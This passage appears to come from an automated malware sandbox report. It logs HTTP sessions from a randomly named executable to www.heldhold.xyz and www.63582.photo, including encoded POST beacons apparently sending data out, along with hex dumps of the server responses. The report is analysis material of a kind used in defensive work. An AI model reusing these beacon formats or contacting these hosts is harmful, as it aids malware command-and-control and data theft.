                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                      Sep 11, 2024 11:18:26.797116041 CEST224INData Raw: 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 41 4e 43 59 20 42 4f 58 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61
                                                      Data Ascii: bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/o
                                                      Sep 11, 2024 11:18:26.797132969 CEST1236INData Raw: 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 6f
                                                      Data Ascii: wl.carousel.min.css" rel="stylesheet"> <link href="assets/vendor/owlcarousel/owl.theme.default.min.css" rel="stylesheet"> ... Timeline --> <link rel="stylesheet" href="assets/vendor/timeline/timeline.css"> ... FABLES CUSTOM C
                                                      Sep 11, 2024 11:18:26.797148943 CEST1236INData Raw: 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 68 69 6c 64 20 73 6b 2d 64 6f 75 62 6c 65 2d 62 6f 75 6e 63 65 31 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 68 69 6c 64 20 73 6b 2d 64 6f 75 62 6c 65 2d 62
                                                      Data Ascii: div class="sk-child sk-double-bounce1"></div> <div class="sk-child sk-double-bounce2"></div> </div></div>... Start Top Header --><div class="fables-forth-background-color fables-top-header-signin"> <div class="container">
                                                      Sep 11, 2024 11:18:26.797164917 CEST1236INData Raw: 3e 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f
                                                      Data Ascii: > </div> </div> </div> <div class="col-12 col-sm-5 col-lg-4 text-right"> <p class="fables-third-text-color font-13"><span class="fables-iconphone"></sp
                                                      Sep 11, 2024 11:18:26.797220945 CEST672INData Raw: 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 66 61 62 6c 65 73 4e 61 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 54 6f 67
                                                      Data Ascii: vDropdown" aria-controls="fablesNavDropdown" aria-expanded="false" aria-label="Toggle navigation"> <span class="fables-iconmenu-icon text-white font-16"></span> </button>
                                                      Sep 11, 2024 11:18:26.798088074 CEST1236INData Raw: 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1"> <li><a class="dropdown-item" href="home1.html">Ho
                                                      Sep 11, 2024 11:18:26.798104048 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a> <ul class="dropdown-menu
                                                      Sep 11, 2024 11:18:26.798120022 CEST448INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68
                                                      Data Ascii: <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li> <li><a class="dropdown-item" href="header2-dark.html
                                                      Sep 11, 2024 11:18:26.798264027 CEST1236INData Raw: 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 33 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: lass="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header
                                                      Sep 11, 2024 11:18:26.802201986 CEST1236INData Raw: 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 34 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 34 20 44 61 72 6b 3c 2f 61 3e 3c 2f 6c 69 3e 0a
                                                      Data Ascii: <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul> </li>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.46333267.223.117.189803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:18:28.747967958 CEST499OUTGET /fava/?pP_8=GCDZpLqdSYk7fT5CRgwCB4qcStchn8AdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQCgtKpqiTYCqf8kUZvClY0WdZB6RiKYyZbbU=&V0Qh=4pBta8 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.heldhold.xyz
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Sep 11, 2024 11:18:29.321966887 CEST1236INHTTP/1.1 404 Not Found
                                                      Date: Wed, 11 Sep 2024 09:18:29 GMT
                                                      Server: Apache
                                                      Content-Length: 32106
                                                      Connection: close
                                                      Content-Type: text/html; charset=utf-8
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                      Sep 11, 2024 11:18:29.322052956 CEST1236INData Raw: 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 41 4e 43 59 20 42 4f 58 20 2d 2d 3e 0a 20 20
                                                      Data Ascii: /bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/owl.c
                                                      Sep 11, 2024 11:18:29.322088003 CEST1236INData Raw: 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 73 65 61 72 63 68 22 3e 3c 2f 69 3e 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                                      Data Ascii: sparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-screen"> <div class="sk-double-bounce"> <div
                                                      Sep 11, 2024 11:18:29.322185040 CEST1236INData Raw: 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 77 68 69 74 65 2d 63 6f 6c
                                                      Data Ascii: lass="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png" alt="england flag" class="mr-1"> French</a>
                                                      Sep 11, 2024 11:18:29.322218895 CEST896INData Raw: 64 20 70 6c 2d 30 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 66 61 62 6c 65 73 2d 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 46 61 62
                                                      Data Ascii: d pl-0" href="index.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#fablesNavDro
                                                      Sep 11, 2024 11:18:29.322294950 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1"> <li><a class="dropdown-item" href=
                                                      Sep 11, 2024 11:18:29.322326899 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a> <ul class
                                                      Sep 11, 2024 11:18:29.322401047 CEST448INData Raw: 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64
                                                      Data Ascii: ></li> <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li> <li><a class="dropdown-item" href="he
                                                      Sep 11, 2024 11:18:29.322433949 CEST1236INData Raw: 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 33 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20
                                                      Data Ascii: <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu"> <li><a class="dropdown-ite
                                                      Sep 11, 2024 11:18:29.322508097 CEST224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 34 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 34
                                                      Data Ascii: <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul> </li>
                                                      Sep 11, 2024 11:18:29.327617884 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d
                                                      Data Ascii: <li><a class="dropdown-item dropdown-toggle" href="#">Header 5</a> <ul class="dropdown-menu">


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.463333147.92.40.175803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:18:35.220805883 CEST760OUTPOST /5o7d/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.63582.photo
                                                      Origin: http://www.63582.photo
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.63582.photo/5o7d/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 2b 4f 32 78 66 51 56 4c 44 65 57 6a 5a 6b 34 65 2b 4d 76 58 6b 71 6c 63 54 2f 52 76 78 35 33 33 4e 69 4b 35 58 57 35 57 6e 52 38 45 4d 43 63 43 6c 61 6c 63 76 58 6f 62 2b 73 69 72 50 51 47 50 66 43 70 42 74 6f 46 50 54 42 6c 4b 54 62 73 6d 56 65 32 41 78 42 30 63 31 59 71 31 61 6e 79 6b 71 4b 32 37 70 33 61 76 32 2f 56 7a 55 73 58 64 77 75 5a 2b 58 70 38 71 4e 70 75 47 46 57 74 75 62 67 72 57 45 4e 6e 6d 7a 57 4d 63 61 73 4b 56 54 75 4b 4c 33 47 33 2f 39 6f 31 45 56 5a 59 5a 6e 47 50 65 64 46 44 50 7a 34 77 68 77 72 35 51 6a 70 42 41 52 4f 64 2b 49 39 5a 36 57 32 55 55 39 67 3d 3d
                                                      Data Ascii: pP_8=+O2xfQVLDeWjZk4e+MvXkqlcT/Rvx533NiK5XW5WnR8EMCcClalcvXob+sirPQGPfCpBtoFPTBlKTbsmVe2AxB0c1Yq1anykqK27p3av2/VzUsXdwuZ+Xp8qNpuGFWtubgrWENnmzWMcasKVTuKL3G3/9o1EVZYZnGPedFDPz4whwr5QjpBAROd+I9Z6W2UU9g==
                                                      Sep 11, 2024 11:18:36.080634117 CEST357INHTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 11 Sep 2024 09:18:35 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Location: https://www.63582.photo/5o7d/
                                                      Server: 8080
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.463334147.92.40.175803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:18:37.765835047 CEST780OUTPOST /5o7d/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.63582.photo
                                                      Origin: http://www.63582.photo
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.63582.photo/5o7d/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 2b 4f 32 78 66 51 56 4c 44 65 57 6a 59 45 6f 65 2f 72 44 58 73 71 6c 66 63 66 52 76 2f 70 33 7a 4e 69 4f 35 58 58 39 34 67 6b 4d 45 43 44 73 43 72 37 6c 63 71 58 6f 62 77 4d 69 75 42 77 47 49 66 43 56 7a 74 6f 4a 50 54 46 4e 4b 54 61 63 6d 57 70 43 44 78 52 30 65 36 34 71 33 56 48 79 6b 71 4b 32 37 70 30 6d 46 32 2f 4e 7a 55 64 48 64 78 4d 78 39 61 4a 38 70 64 35 75 47 4f 32 74 69 62 67 72 30 45 49 2f 41 7a 55 30 63 61 70 75 56 51 36 65 49 69 32 33 35 7a 49 31 4b 55 63 6c 54 69 6c 4b 58 44 30 48 76 73 59 45 6a 78 74 6f 4b 79 59 67 58 44 4f 35 4e 56 36 51 4f 62 31 70 64 6d 6d 2b 43 56 47 32 42 78 4b 6f 72 2b 62 76 4b 42 30 2b 51 31 77 59 3d
                                                      Data Ascii: pP_8=+O2xfQVLDeWjYEoe/rDXsqlfcfRv/p3zNiO5XX94gkMECDsCr7lcqXobwMiuBwGIfCVztoJPTFNKTacmWpCDxR0e64q3VHykqK27p0mF2/NzUdHdxMx9aJ8pd5uGO2tibgr0EI/AzU0capuVQ6eIi235zI1KUclTilKXD0HvsYEjxtoKyYgXDO5NV6QOb1pdmm+CVG2BxKor+bvKB0+Q1wY=
                                                      Sep 11, 2024 11:18:38.649354935 CEST357INHTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 11 Sep 2024 09:18:38 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Location: https://www.63582.photo/5o7d/
                                                      Server: 8080
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      19192.168.2.463335147.92.40.175803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:18:40.318083048 CEST10862OUTPOST /5o7d/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.63582.photo
                                                      Origin: http://www.63582.photo
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.63582.photo/5o7d/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 2b 4f 32 78 66 51 56 4c 44 65 57 6a 59 45 6f 65 2f 72 44 58 73 71 6c 66 63 66 52 76 2f 70 33 7a 4e 69 4f 35 58 58 39 34 67 6b 45 45 43 78 6b 43 72 59 4e 63 74 58 6f 62 75 63 69 76 42 77 47 5a 66 43 4d 36 74 6f 31 66 54 48 46 4b 54 34 55 6d 43 4e 65 44 2b 52 30 65 78 59 71 32 61 6e 7a 6b 71 4a 4f 6e 70 30 32 46 32 2f 4e 7a 55 65 50 64 32 65 5a 39 4a 35 38 71 4e 70 75 42 46 57 74 4f 62 6b 50 4f 45 4a 4c 50 7a 6e 38 63 5a 4a 2b 56 41 63 69 49 67 57 33 37 2b 6f 30 4d 55 63 68 51 69 6d 75 78 44 30 7a 4a 73 62 59 6a 78 4a 52 4a 72 4c 55 32 51 75 78 53 42 37 6f 79 55 57 52 4e 6e 32 65 74 54 55 32 63 73 65 31 48 38 35 2f 48 55 31 36 6b 69 48 62 7a 51 76 68 59 67 4e 46 55 51 58 63 65 58 50 38 39 63 53 68 52 45 6d 6d 33 37 36 66 41 70 51 2b 4b 79 71 49 48 37 72 4f 4c 6a 54 65 58 4e 6c 39 42 6f 57 6e 45 52 75 43 58 5a 71 70 6d 38 6b 62 57 2f 59 4e 71 65 57 70 70 48 55 43 32 7a 39 42 6d 44 33 62 49 49 55 79 59 4d 5a 34 78 77 7a 73 31 50 7a 71 70 59 45 79 76 76 4d 79 62 38 7a 68 72 42 63 39 39 47 [TRUNCATED]
